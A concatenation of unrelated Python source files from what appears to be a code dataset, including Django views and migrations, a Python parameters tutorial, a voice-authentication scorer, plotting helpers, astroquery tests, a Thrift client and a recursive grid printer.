        #     return render(request, 'feed/add_stop.html', context)
        # else:
        #     print('caravan_name not valid')
        #     pass
        s_form = StopCreateForm(instance=request.user)
        context = {'s_form':s_form, 'c_name': c_name}
        return render(request, 'feed/add_stop.html', context)
    #context={}
    #return render(request, 'feed/add_stop.html', context)
# @login_required
# def edit_stop(request):
# #must be a leader if decided, or the creator or a leader if tentative or proposal
# context={}
# return render(request, 'feed/edit_stop.html', context)
@login_required
def stop_vote_yes(request, slug):
    """Record a 'yes' vote by the current user on the stop's forum."""
    target = Stop.objects.get(slug=slug)
    forum = StopForum.objects.get(stop=target)
    ballot = Vote.create_yes(request.user, forum)
    ballot.save()
    return HttpResponseRedirect(f'/feed/stop/{target.slug}')
@login_required
def stop_remove_vote(request, slug):
    """Delete every vote the current user has cast on this stop's forum."""
    target = Stop.objects.get(slug=slug)
    forum = StopForum.objects.get(stop=target)
    user_votes = Vote.objects.filter(user=request.user, forum=forum).all()
    user_votes.delete()
    return HttpResponseRedirect(f'/feed/stop/{target.slug}')
984,632 | 2bb80eca9e1ea7dc5742973b822d68e6ae88ff31 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
# An empty function
def nop():
    """Do nothing; shows that an empty function body needs ``pass``."""
    pass
def my_abs(x):
    """Return the absolute value of *x*, rejecting non-numeric input."""
    if not isinstance(x, (int, float)):
        raise TypeError('bad operand type')
    return x if x >= 0 else -x
def move(x, y, step, angle=0):
    """Shift (x, y) by *step* along *angle* (radians); return the new point."""
    dx = step * math.cos(angle)
    dy = step * math.sin(angle)
    return x + dx, y - dy
n = my_abs(-20)
print(n)
x, y = move(100, 100, 60, math.pi / 6)
print(x, y)
# TypeError: bad operand type:
# my_abs('123')
print()
# Positional (ordinary) parameters
# Default parameters
def power(x, n=2):
    """Return x raised to the power n (defaults to squaring)."""
    result = 1
    remaining = n
    while remaining > 0:
        remaining -= 1
        result *= x
    return result
print(power(5))
print(power(5, 2))
print()
# Default parameters must not point to mutable objects
def add_end(L=[]):
    """Append 'END' to L and return it.

    Deliberately buggy teaching example: the mutable default list is shared
    across calls, so repeated no-arg calls keep accumulating 'END' entries.
    """
    L.append('END')
    return L
# A corrected version of the function above
def add_end2(L=None):
    """Append 'END' to *L* (a fresh list when omitted) and return it."""
    target = [] if L is None else L
    target.append('END')
    return target
print(add_end())
print(add_end())
print()
print(add_end2())
print(add_end2())
print()
# Variadic parameters: a leading * on a parameter packs the
# positional arguments into a tuple at call time
def calc(*numbers):
    """Return the sum of the squares of all given numbers."""
    return sum(value * value for value in numbers)
print(calc())
print(calc(1, 2))
print(calc(*[1, 2, 3]))
print()
# Keyword parameters
# A **kw parameter accepts zero or more named arguments, collected into a dict inside the function
def person(name, age, **kw):
    """Print a person's info; any extra attributes arrive via **kw."""
    if 'city' in kw:
        # a city argument was supplied (placeholder branch)
        pass
    if 'job' in kw:
        # a job argument was supplied (placeholder branch)
        pass
    print('name:', name, 'age:', age, 'other:', kw)
person('Michael', 30)
person('Bob', 35, city='Beijing')
person('Adam', 45, gender='M', job='Engineer')
extra = {'city': 'Beijing', 'job': 'Engineer'}
person('Jack', 24, city=extra['city'], job=extra['job'])
person('Jack', 24, **extra)
print()
# Keyword-only parameters
# Use these to restrict which keyword names a caller may pass
# Names after the special bare * separator must be passed by keyword
def person(name, age, *, city, job):
    """Demo: city and job are keyword-only (note the bare * separator)."""
    print(name, age, city, job)
person('Jack', 24, city='Beijing', job='Engineer')
# When the definition already has a *args parameter, the keyword-only parameters after it need no bare * separator
def person(name, age, *args, city='Beijing', job):
    """Demo: after *args, city/job are keyword-only without a bare *."""
    print(name, age, args, city, job)
person('Jack', 24, *[1, 2, 3], job='Engineer')
print()
# Combining parameter kinds
# Definition order must be: required, default, *args, keyword-only, then **kw
def f1(a, b, c=0, *args, **kw):
    """Demo: required + default + *args + **kw combination."""
    print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
    """Demo: keyword-only d after the bare *, plus catch-all **kw."""
    print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
f1(1, 2)
f1(1, 2, c=3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
print()
# Any function can be called as func(*args, **kw), no matter how its parameters were defined
f1(*(1, 2, 3, 4), **{'d': 99, 'x': '#'})
f2(*(1, 2, 3), **{'d': 88, 'x': '#'})
|
984,633 | a3193bce83ccc5722163ffad89c8da58a481d511 | '''
Created on 16-Oct-2018
@author: Vishnu
'''
from VoiceAuthentication.Features import mfcc
from sklearn.externals import joblib
import os
from sklearn.neighbors import LSHForest
from sklearn.metrics import pairwise_distances_argmin_min
path = os.getcwd() + '/VoiceAuthentication/VoiceAuthentication'
def predict(login, file):
    """Verify a speaker claim: compare *file*'s MFCC features against the
    stored GMM/UBM models for *login* and return a result dict.

    Keys: 'score' -> [GMM-UBM log-likelihood ratio, LSH neighbour distances],
    'distance' -> pairwise argmin/min output, 'Message' -> verdict string.
    """
    login_features = mfcc(login, file)
    lshf = LSHForest(random_state=42)
    # speaker-specific GMM, universal background model, and raw feature template
    gmm = joblib.load(path + '/speaker_models/' + login + '.pkl')
    ubm = joblib.load(path + '/speaker_models/' + 'ubm.pkl')
    model = joblib.load(path + '/speaker_models/' + login + 'Model.pkl')
    gmm_likelihood_score = gmm.score(login_features)
    ubm_likelihood_score = ubm.score(login_features)
    # likelihood-ratio test: positive means closer to the claimed speaker
    likelihood_score = gmm_likelihood_score - ubm_likelihood_score
    # flatten the frame-wise features into one long vector
    login_features = [j for i in login_features for j in i]
    # Truncate the longer vector so both sides have equal length before the
    # nearest-neighbour comparison.
    # NOTE(review): kneighbors(n_neighbors=2) on a forest fitted with a
    # single sample looks inconsistent - confirm against sklearn's contract.
    if len(model) > len(login_features):
        array = model[:len(login_features)]
        lshf.fit([array])
        distances, indices = lshf.kneighbors([login_features], n_neighbors=2)
        dist = pairwise_distances_argmin_min([array], [login_features])
    else:
        array = login_features[:len(model)]
        lshf.fit([array])
        distances, indices = lshf.kneighbors([model], n_neighbors=2)
        dist = pairwise_distances_argmin_min([array], [model])
    result = {}
    result['score'] = [likelihood_score, distances]
    result['distance'] = dist
    # NOTE(review): only the likelihood ratio drives the verdict; the LSH
    # distances are reported but unused - confirm that is intentional.
    if likelihood_score > 0:
        result['Message'] = 'Authenticated'
    else:
        result['Message'] = 'Not Authenticated'
    return result
|
984,634 | ac545b03a52e233a3c0168eee7625b94ca08d3ee | """
Helper functions for displaying data and making interactive plots.
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
import ipywidgets as widgets
from IPython.display import display, clear_output
import cmocean
import cartopy.crs as ccrs
from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter
def minmax(data, fields):
    """
    Get the minimum and maximum data values out of all fields given.
    Returns them in a dictionary with the 'vmin' and 'vmax' keys.
    """
    lows = [data[field].min() for field in fields]
    highs = [data[field].max() for field in fields]
    return dict(vmin=min(lows), vmax=max(highs))
def plot_field(ax, data, field, cmap=None, gridline_spacing=3, cb_pad=0.03,
               cb_aspect=50, cb_shrink=0.8, ticks=True, title=True, **kwargs):
    """
    Make a pcolormesh plot of the given data field.
    Sets the plot extent and includes ticks in longitude and latitude.
    """
    if title:
        ax.set_title(field)
    # default to a horizontal colorbar unless the caller manages it
    if 'add_colorbar' not in kwargs:
        kwargs['cbar_kwargs'] = dict(orientation='horizontal',
                                     aspect=cb_aspect, pad=cb_pad,
                                     shrink=cb_shrink)
    data[field].plot.pcolormesh(ax=ax, add_labels=False, cmap=cmap, **kwargs)
    ax.coastlines()
    # clamp the view to the data's lon/lat bounding box
    w, e, s, n = [data.longitude.values.min(), data.longitude.values.max(),
                  data.latitude.values.min(), data.latitude.values.max()]
    ax.set_extent([w, e, s, n])
    # 0.01 nudges the endpoint so the final gridline is included
    xlocs = np.arange(w, e + 0.01, gridline_spacing)
    ylocs = np.arange(s, n + 0.01, gridline_spacing)
    if ticks:
        ax.set_xticks(xlocs)
        ax.set_yticks(ylocs)
        ax.xaxis.set_major_formatter(LongitudeFormatter())
        ax.yaxis.set_major_formatter(LatitudeFormatter())
    ax.gridlines(color="#cccccc55", xlocs=xlocs, ylocs=ylocs)
def plot_hawaii_data(data, field, **kwargs):
    """
    Plot a given field from our Hawai'i dataset.
    """
    plt.figure(figsize=(12, 13))
    ax = plt.axes(projection=ccrs.PlateCarree())
    plot_field(ax, data, field, **kwargs)
    plt.tight_layout(pad=0)
def plot_japan_data(data, field, **kwargs):
    """
    Plot a given field from our Japan dataset.
    """
    plt.figure(figsize=(12, 13))
    ax = plt.axes(projection=ccrs.PlateCarree())
    # wider gridline spacing for the larger Japan region
    plot_field(ax, data, field, gridline_spacing=5, **kwargs)
    plt.tight_layout(pad=0)
def plot_himalayas_data(data, field, **kwargs):
    """
    Plot a given field from our Himalayas dataset.
    """
    plt.figure(figsize=(12, 13))
    ax = plt.axes(projection=ccrs.PlateCarree())
    # wider gridline spacing for the larger Himalayan region
    plot_field(ax, data, field, gridline_spacing=5, **kwargs)
    plt.tight_layout(pad=0)
class ProfileSelector(object):
    """
    Define a widget for selecting and plotting profiles from a dataset.
    Use the ``interact`` method to insert an interactive widget to control
    the profile location.
    Use the ``plot`` method to plot a static profile figure.

    Parameters
    ----------
    data : xarray.Dataset
        The data grid.
    fields : list of str
        The fields to plot in the upper profile
    figsize : tuple
        The size of the profile figure
    projection : cartopy CRS
        A cartopy projection to apply to the data maps
    """

    def __init__(self, data, fields, projection, figsize=(15, 9),
                 profile_interval=10, dimension='latitude'):
        self.data = data
        self.fields = fields
        # figure/axes are created lazily on the first plot() call
        self._plot_initiated = False
        self.projection = projection
        self.figsize = figsize
        self.profile_interval = profile_interval
        self.default_dimension = dimension

    def plot(self, location, dimension):
        """
        Plot a figure of the profile at location along dimension.
        """
        if not self._plot_initiated:
            # Setup the figure and subplot grid
            self.fig = plt.figure(figsize=self.figsize)
            grid = GridSpec(2, 4, hspace=0, wspace=0)
            self.ax_data = self.fig.add_subplot(grid[0, :-1])
            self.ax_topo = self.fig.add_subplot(grid[1, :-1])
            self.ax_data_map = self.fig.add_subplot(grid[0, -1],
                                                    projection=self.projection)
            self.ax_topo_map = self.fig.add_subplot(grid[1, -1],
                                                    projection=self.projection)
            # The y axis limits for the profiles
            self._topo_base = -10000
            ylim_topo = [self._topo_base, self.data.topography_ell.max()*1.1]
            ylim_data = list(sorted(minmax(self.data, self.fields).values()))
            # Set labels and dimensions
            self.ax_data.set_ylim(ylim_data)
            self.ax_data.set_ylabel('mGal')
            self.ax_topo.set_ylim(ylim_topo)
            # fixed label typo (was 'Tropography (m)')
            self.ax_topo.set_ylabel('Topography (m)')
            self.ax_data.grid(True)
            self.ax_data.set_xticklabels([])
            # Draw the profile lines
            self._data_lines = {}
            for field in self.fields:
                self._data_lines[field], = self.ax_data.plot([0], [0], '-',
                                                             label=field)
            self.ax_data.legend(loc='upper right')
            # Place holders for the topography polygons
            self._water_fill = None
            self._topo_fill = None
            # Plot the maps
            plot_field(self.ax_data_map, self.data, self.fields[0],
                       ticks=False, add_colorbar=False, title=False,
                       cmap='RdBu_r')
            plot_field(self.ax_topo_map, self.data, 'topography_ell',
                       ticks=False, add_colorbar=False, title=False,
                       cmap=cmocean.cm.delta)
            # Draw on the maps showing the profiles
            self._datamap_profile, = self.ax_data_map.plot([0, 0], [0, 0],
                                                           '--k')
            self._topomap_profile, = self.ax_topo_map.plot([0, 0], [0, 0],
                                                           '--k')
            plt.tight_layout(pad=0, h_pad=0, w_pad=0)
            self._plot_initiated = True
        # Get the name of the other dimension
        dim_comp = set(self.data.dims).difference({dimension}).pop()
        # Get the profile
        x = self.data[dimension]
        xlim = [x.min(), x.max()]
        profile = self.data.loc[{dim_comp: location}]
        # Update the data plots
        for field in self.fields:
            self._data_lines[field].set_data(x, profile[field])
        # Update the topography plot (remove and redraw the filled polygons)
        if self._topo_fill is not None:
            self._topo_fill.remove()
        if self._water_fill is not None:
            self._water_fill.remove()
        self._water_fill = self.ax_topo.fill_between(xlim, [0, 0],
                                                     self._topo_base,
                                                     color='#2780E3')
        self._topo_fill = self.ax_topo.fill_between(x, profile.topography_ell,
                                                    self._topo_base,
                                                    color='#333333')
        # Update the profile location plot
        profile_location = [xlim, [location, location]]
        if dimension.lower() == 'latitude':
            # a latitude profile is drawn as a vertical line on the map
            profile_location = profile_location[::-1]
        self._datamap_profile.set_data(*profile_location)
        self._topomap_profile.set_data(*profile_location)
        # Make sure the plots are tight
        self.ax_data.set_xlim(xlim)
        self.ax_topo.set_xlim(xlim)
        self.ax_topo.set_xlabel(dimension.capitalize())
        plt.show()

    def interact(self):
        """
        Display an interactive widget for choosing the profile.
        """
        # Setup the initial value options for the location
        dim = self.default_dimension
        dim2 = set(self.data.dims).difference({dim}).pop()
        options = self.data[dim2].values.tolist()[::self.profile_interval]
        mid = options[len(options)//2]
        # Make the slider for choosing the location
        slider_label = widgets.Label("at {} value".format(dim2))
        slider = widgets.SelectionSlider(options=options, value=mid,
                                         layout=widgets.Layout(width="350px"))
        # Make a menu for choosing the profile direction
        dimension_chooser = widgets.Dropdown(
            options=self.data.dims.keys(), value=dim,
            description="Profile along")

        def displayer(location, dimension):
            "Update and display the plot with given arguments"
            self.plot(location, dimension)
            display(self.fig)

        def handle_dimension_change(change):
            "Change the location options when dimension changes"
            dim2 = set(self.data.dims).difference({change.new}).pop()
            slider_label.value = "at {} value".format(dim2)
            options = self.data[dim2].values.tolist()[::self.profile_interval]
            slider.options = options
            slider.value = options[len(options)//2]

        # Connect the dimension change to the slider
        dimension_chooser.observe(handle_dimension_change, names='value')
        # Make the output display and connect it to the callback
        output = widgets.interactive_output(
            displayer, {'location': slider, 'dimension': dimension_chooser})
        # Make a title for the widget
        title = widgets.HTML(
            '<strong style="font-size: 1.5em;">Profile selector</strong>')
        # Layout the widgets
        layout = widgets.VBox(
            [title,
             widgets.HBox([dimension_chooser, slider_label, slider]),
             output],
            layout=widgets.Layout(align_items="center"))
        # For some reason, calling _figure_setup inserts a plot in the output
        # Call clear_output to get rid of it.
        with output:
            clear_output(wait=True)
            display(self.fig)
        return layout
|
984,635 | 14327fc566f97fb27448fae3efb1021383990568 | #!/usr/bin/python3
"""
# -*- coding: utf-8 -*-
# @Time : 2020/8/28 17:42
# @File : pre_process.py
"""
import torchvision
from torchvision import transforms
from torchtoolbox.transform import Cutout
def normal_transform():
    """Baseline preprocessing: convert a PIL image/ndarray to a tensor only."""
    steps = [torchvision.transforms.ToTensor()]
    return torchvision.transforms.Compose(steps)
# Todo: Add Pre_Process, adjust your parameters——task five
def data_augment_transform():
    """Training-time augmentation pipeline.

    Order matters: the spatial augmentations operate on the PIL image, so
    ``ToTensor`` must come last.
    """
    data_augment = torchvision.transforms.Compose([
        # RandomCrop: crop to 30x30 after zero-padding 2 px on each side
        transforms.RandomCrop(size=30, padding=2),
        # Cutout occlusion; 0.5 is presumably the apply-probability --
        # confirm against the torchtoolbox documentation.
        Cutout(0.5),
        # HorizontalFlip
        transforms.RandomHorizontalFlip(p=0.5),
        # VerticalFlip
        transforms.RandomVerticalFlip(p=0.5),
        torchvision.transforms.ToTensor()
    ])
    return data_augment
|
984,636 | 3a18c727e48c2742c065bf528f8e49961b393d26 | t#/usr/bin/python3
# Import guard: this module is meant to be imported, not executed directly.
if __name__ == '__main__':
    print("This is a package , please import it into your code")
|
984,637 | 40795ca7cb66724997c3fa0bcfaf59f5dcf86db1 | # Generated by Django 3.1.7 on 2021-04-20 07:53
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated schema changes for the ``blog`` app (2021-04-20).

    Adds ``Comment.published_date`` and rewrites the ``created_date``
    columns on ``Comment`` and ``Post``.
    """

    dependencies = [
        ('blog', '0002_auto_20210420_1019'),
    ]

    operations = [
        migrations.AddField(
            model_name='comment',
            name='published_date',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='comment',
            name='created_date',
            # NOTE(review): a datetime as ``verbose_name`` looks like a model
            # definition mistake (probably meant ``default=``) that
            # makemigrations captured faithfully -- fix in models.py and
            # regenerate; do not hand-edit the applied migration.
            field=models.DateTimeField(verbose_name=datetime.datetime(2021, 4, 20, 7, 53, 35, 35821, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='post',
            name='created_date',
            field=models.DateTimeField(default=datetime.datetime(2021, 4, 20, 7, 53, 35, 34968, tzinfo=utc)),
        ),
    ]
|
984,638 | 7c1db888d6df7dd87417a209251712d4c52aebeb | """ Test Gemini Astroquery module.
For information on how/why this test is built the way it is, see the astroquery
documentation at:
https://astroquery.readthedocs.io/en/latest/testing.html
"""
from datetime import date
import json
import os
import pytest
import requests
from astropy import units
from astropy.coordinates import SkyCoord
from astropy.table import Table
from astroquery import gemini
from astroquery.gemini.urlhelper import URLHelper
DATA_FILES = {"m101": "m101.json"}
class MockResponse:
    """Minimal stand-in for a ``requests`` response object.

    Only the parts the Gemini module touches are provided: the raw ``text``
    attribute and a ``json()`` decoder.
    """

    def __init__(self, text):
        # Keep the canned payload exactly as a real response would expose it.
        self.text = text

    def json(self):
        """Decode ``text`` as JSON, mirroring ``requests.Response.json``."""
        payload = self.text
        return json.loads(payload)
@pytest.fixture
def patch_get(request):
    """Patch ``requests.Session.request`` to return canned archive JSON.

    Returns the monkeypatch fixture so tests could add further patches;
    the ``getfuncargvalue`` fallback supports pytest < 3.
    """
    try:
        mp = request.getfixturevalue("monkeypatch")
    except AttributeError:  # pytest < 3
        mp = request.getfuncargvalue("monkeypatch")
    # Every HTTP verb funnels through Session.request, so one patch covers all.
    mp.setattr(requests.Session, 'request', get_mockreturn)
    return mp
def get_mockreturn(url, *args, **kwargs):
    """Build a :class:`MockResponse` from the bundled m101 JSON fixture.

    Loosely matches the ``requests.Session.request`` signature; the url and
    any extra arguments are ignored -- every call returns the same canned
    data.  The file is now opened with a context manager so the handle is
    closed even if the read raises (the original leaked it in that case).
    """
    filename = data_path(DATA_FILES['m101'])
    with open(filename, 'r') as f:
        text = f.read()
    return MockResponse(text)
def data_path(filename):
    """Return the path of *filename* inside this module's ``data`` directory."""
    here = os.path.dirname(__file__)
    return os.path.join(here, 'data', filename)
""" Coordinates to use for testing """
coords = SkyCoord(210.80242917, 54.34875, unit="deg")
def test_observations_query_region(patch_get):
""" test query against a region of the sky """
result = gemini.Observations.query_region(coords, radius=0.3 * units.deg)
assert isinstance(result, Table)
assert len(result) > 0
def test_observations_query_criteria(patch_get):
""" test query against an instrument/program via criteria """
result = gemini.Observations.query_criteria(instrument='GMOS-N', program_id='GN-CAL20191122',
observation_type='BIAS',
utc_date=(date(2019, 10, 1), date(2019, 11, 25)))
assert isinstance(result, Table)
assert len(result) > 0
def test_observations_query_raw(patch_get):
""" test querying raw """
result = gemini.Observations.query_raw('GMOS-N', 'BIAS', progid='GN-CAL20191122')
assert isinstance(result, Table)
assert len(result) > 0
def test_url_helper_arg():
    """Positional args are appended verbatim as path segments."""
    urlh = URLHelper()
    args = ["foo"]
    kwargs = {}
    url = urlh.build_url(*args, **kwargs)
    assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/foo"


def test_url_helper_kwarg():
    """Keyword args become ``key=value`` path segments."""
    urlh = URLHelper()
    args = []
    kwargs = {"foo": "bar"}
    url = urlh.build_url(*args, **kwargs)
    assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/foo=bar"


def test_url_helper_radius():
    """``radius`` is translated to a formatted ``sr=...d`` segment."""
    urlh = URLHelper()
    args = []
    kwargs = {"radius": "0.4d"}
    url = urlh.build_url(*args, **kwargs)
    assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/sr=0.400000d"


def test_url_helper_coordinates():
    """``coordinates`` is split into separate ``ra=``/``dec=`` segments."""
    urlh = URLHelper()
    args = []
    kwargs = {"coordinates": "210.80242917 54.348753"}
    url = urlh.build_url(*args, **kwargs)
    assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/ra=210.802429/dec=54.348753"
|
984,639 | 463c066c7583e72989a35eec3ce22b55fda4b78c | import sys, os
sys.path.append('./gen-py')
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from services import HelloFriend
from services import FileResourceService
from server import Server
SERVICE_TIMEOUT_IN_mS = 300
# Establishing a connection with the server
class ClientConnection:
    """Locates a service node and opens a Thrift connection to it (Python 2).

    Iterates over the servers supplied by :class:`Server`, returning client
    stubs for the first node that accepts a connection.
    """

    # Class-level placeholders; replaced with real objects per instance.
    transport = ''
    server = ''

    def __init__(self):
        self.log = {}
        self.server = Server()

    def start(self):
        """Try servers in order; return (HelloFriend, FileResourceService) stubs.

        Falls through (implicitly returning None) once the server list is
        exhausted; user-facing messages are in Polish by design.
        """
        retry = False
        socket = self.server.getServer()
        while socket != 0:
            # After a failed attempt, advance to the next candidate server.
            if retry == True:
                socket = self.server.nextServer()
                if socket == 0:
                    print "Usluga niedostepna"
                    break
            host = socket['ip']
            port = socket['client_service_port']
            try:
                # Make socket
                self.transport = TSocket.TSocket(host, port)
                #self.transport.setTimeout(SERVICE_TIMEOUT_IN_mS)
                # Buffering is critical. Raw sockets are very slow
                self.transport = TTransport.TBufferedTransport(self.transport)
                # Wrap in a protocol
                protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
                # Create a client to use the protocol encoder
                client = HelloFriend.Client(protocol)
                client2 = FileResourceService.Client(protocol)
                # Connect!
                k = self.transport.open()
                print "Rozmawialem z: " + socket['ip'] + ':' + str(socket['client_service_port'])
                #client.ping()
                #print "ping()"
                #msg = client.sayHello()
                #print msg
                return client, client2
            except Thrift.TException, tx:
                # Connection failed: mark for retry with the next server.
                retry = True
                print "%s" % (tx.message)

    def stop(self):
        """Close the transport; errors are reported but not re-raised."""
        try:
            self.transport.close()
        except Thrift.TException, tx:
            print "%s" % (tx.message) |
984,640 | 972a02dd915e121dfa16c96ebef1726f9aa1edd5 | # Generated by Django 2.1.7 on 2019-02-22 23:50
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial (state-only) migration for the OSHA/GIS app.

    Every model is ``managed = False``: the tables already exist in the
    database (loaded externally), so this migration records Django state
    without creating any tables.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        # NAICS industry code lookup table.
        migrations.CreateModel(
            name='NaicsCodesData',
            fields=[
                ('codes', models.IntegerField(primary_key=True, serialize=False)),
                ('titles', models.CharField(blank=True, max_length=300, null=True)),
            ],
            options={
                'db_table': 'naics_codes_data',
                'managed': False,
            },
        ),
        # One row per OSHA inspection activity.
        migrations.CreateModel(
            name='OshaInspectionData',
            fields=[
                ('activity_nr', models.IntegerField(primary_key=True, serialize=False)),
                ('reporting_id', models.IntegerField(blank=True, null=True)),
                ('state_flag', models.CharField(blank=True, max_length=6, null=True)),
                ('estab_name', models.CharField(blank=True, max_length=128, null=True)),
                ('site_address', models.CharField(blank=True, max_length=200, null=True)),
                ('site_city', models.CharField(blank=True, max_length=64, null=True)),
                ('site_state', models.CharField(blank=True, max_length=2, null=True)),
                ('site_zip', models.IntegerField(blank=True, null=True)),
                ('owner_type', models.CharField(blank=True, max_length=32, null=True)),
                ('owner_code', models.IntegerField(blank=True, null=True)),
                ('adv_notice', models.CharField(blank=True, max_length=2, null=True)),
                ('safety_hlth', models.CharField(blank=True, max_length=2, null=True)),
                ('sic_code', models.IntegerField(blank=True, null=True)),
                ('naics_code', models.IntegerField(blank=True, null=True)),
                ('insp_type', models.CharField(blank=True, max_length=20, null=True)),
                ('insp_scope', models.CharField(blank=True, max_length=20, null=True)),
                ('why_no_insp', models.CharField(blank=True, max_length=32, null=True)),
                ('union_status', models.CharField(blank=True, max_length=6, null=True)),
                ('safety_manuf', models.CharField(blank=True, max_length=10, null=True)),
                ('safety_const', models.CharField(blank=True, max_length=10, null=True)),
                ('safety_marit', models.CharField(blank=True, max_length=10, null=True)),
                ('health_manuf', models.CharField(blank=True, max_length=10, null=True)),
                ('health_const', models.CharField(blank=True, max_length=10, null=True)),
                ('health_marit', models.CharField(blank=True, max_length=10, null=True)),
                ('migrant', models.CharField(blank=True, max_length=10, null=True)),
                ('mail_street', models.CharField(blank=True, max_length=200, null=True)),
                ('mail_city', models.CharField(blank=True, max_length=64, null=True)),
                ('mail_state', models.CharField(blank=True, max_length=2, null=True)),
                ('mail_zip', models.IntegerField(blank=True, null=True)),
                ('host_est_key', models.CharField(blank=True, max_length=20, null=True)),
                ('nr_in_estab', models.IntegerField(blank=True, null=True)),
                ('open_date', models.DateField(blank=True, null=True)),
                ('case_mod_date', models.DateField(blank=True, null=True)),
                ('close_conf_date', models.DateField(blank=True, null=True)),
                ('close_case_date', models.DateField(blank=True, null=True)),
                ('ld_dt', models.DateTimeField(blank=True, null=True)),
            ],
            options={
                'db_table': 'osha_inspection_data',
                'managed': False,
            },
        ),
        # Severe-injury incident reports (with lat/long for mapping).
        migrations.CreateModel(
            name='OshaSevereInjuryData',
            fields=[
                ('injury_index', models.IntegerField(primary_key=True, serialize=False)),
                ('incident_id', models.BigIntegerField(blank=True, null=True)),
                ('event_date', models.DateField(blank=True, null=True)),
                ('employer', models.CharField(blank=True, max_length=128, null=True)),
                ('address1', models.CharField(blank=True, max_length=128, null=True)),
                ('address2', models.CharField(blank=True, max_length=128, null=True)),
                ('city', models.CharField(blank=True, max_length=64, null=True)),
                ('state', models.CharField(blank=True, max_length=32, null=True)),
                ('zipcode', models.IntegerField(blank=True, null=True)),
                ('latitude', models.FloatField(blank=True, null=True)),
                ('longitude', models.FloatField(blank=True, null=True)),
                ('naics_code', models.IntegerField(blank=True, null=True)),
                ('hospitalized', models.SmallIntegerField(blank=True, null=True)),
                ('amputation', models.SmallIntegerField(blank=True, null=True)),
                ('final_description', models.CharField(blank=True, max_length=3000, null=True)),
                ('body_part', models.CharField(blank=True, max_length=64, null=True)),
            ],
            options={
                'db_table': 'osha_severe_injury_data',
                'managed': False,
            },
        ),
        # SIC industry code lookup table.
        migrations.CreateModel(
            name='SicCodesData',
            fields=[
                ('code', models.SmallIntegerField(primary_key=True, serialize=False)),
                ('description', models.CharField(blank=True, max_length=128, null=True)),
            ],
            options={
                'db_table': 'sic_codes_data',
                'managed': False,
            },
        ),
        # US state boundary polygons (GeoDjango).
        migrations.CreateModel(
            name='UsStatesSpatialData',
            fields=[
                ('gid', models.AutoField(primary_key=True, serialize=False)),
                ('statefp', models.CharField(blank=True, max_length=2, null=True)),
                ('statens', models.CharField(blank=True, max_length=8, null=True)),
                ('affgeoid', models.CharField(blank=True, max_length=11, null=True)),
                ('geoid', models.CharField(blank=True, max_length=2, null=True)),
                ('stusps', models.CharField(blank=True, max_length=2, null=True)),
                ('name', models.CharField(blank=True, max_length=100, null=True)),
                ('lsad', models.CharField(blank=True, max_length=2, null=True)),
                ('aland', models.FloatField(blank=True, null=True)),
                ('awater', models.FloatField(blank=True, null=True)),
                ('geom', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, null=True, srid=4326)),
            ],
            options={
                'db_table': 'us_states_spatial_data',
                'managed': False,
            },
        ),
        # ZIP-code (ZCTA) polygons imported from KML-style source data.
        migrations.CreateModel(
            name='ZipcodesSpatialData',
            fields=[
                ('gid', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(blank=True, max_length=254, null=True)),
                ('descriptio', models.CharField(blank=True, max_length=254, null=True)),
                ('timestamp', models.CharField(blank=True, max_length=24, null=True)),
                ('begin', models.CharField(blank=True, max_length=24, null=True)),
                ('end', models.CharField(blank=True, max_length=24, null=True)),
                ('altitudemo', models.CharField(blank=True, max_length=254, null=True)),
                ('tessellate', models.BigIntegerField(blank=True, null=True)),
                ('extrude', models.BigIntegerField(blank=True, null=True)),
                ('visibility', models.BigIntegerField(blank=True, null=True)),
                ('draworder', models.BigIntegerField(blank=True, null=True)),
                ('icon', models.CharField(blank=True, max_length=254, null=True)),
                ('zcta5ce10', models.CharField(blank=True, max_length=254, null=True)),
                ('affgeoid10', models.CharField(blank=True, max_length=254, null=True)),
                ('geoid10', models.CharField(blank=True, max_length=254, null=True)),
                ('aland10', models.CharField(blank=True, max_length=254, null=True)),
                ('awater10', models.CharField(blank=True, max_length=254, null=True)),
                ('geom', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, dim=4, null=True, srid=4326)),
            ],
            options={
                'db_table': 'zipcodes_spatial_data',
                'managed': False,
            },
        ),
    ]
|
984,641 | fa8b6b3906370e1efe689f4d5ad950f092b5e986 | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 2 23:46:43 2014
@author: cbeery
"""
# grid prints a n by n grid of box such that pipes
# and hyphens form walls and plus signs form corners
# input: sidelength, this is the number of boxes
# form one side of the grid;
# assumes non-negative integer
# "output": displays grid
#
wallChar = 4 #the number of chars in a wall
heightGoal = 0 #counts reps for vert walls
j = 0 # tracks current box height
def make_grid(sideLength):
    """Print a sideLength x sideLength grid of boxes via mutual recursion.

    NOTE(review): this relies on the Python 2 semantics of ``print('|'),``
    in make_walls (trailing comma suppresses the newline); under Python 3
    that statement prints a newline after '|', so the grid renders wrong.
    """
    global j
    j = 0 #resets j
    if(j < sideLength):
        make_top(sideLength)
        make_rest(sideLength)


def make_rest(s):
    """Recursively print one row of boxes (walls + bottom edge) per call."""
    global j
    if (j < s):
        make_walls(s)
        make_top(s)
        # One more row of boxes completed.
        j = j + 1
        make_rest(s)

# makes one horizontal line of '+'-cornered wall segments
def make_top(s):
    print('+' + (' -'*wallChar + ' +')*s)

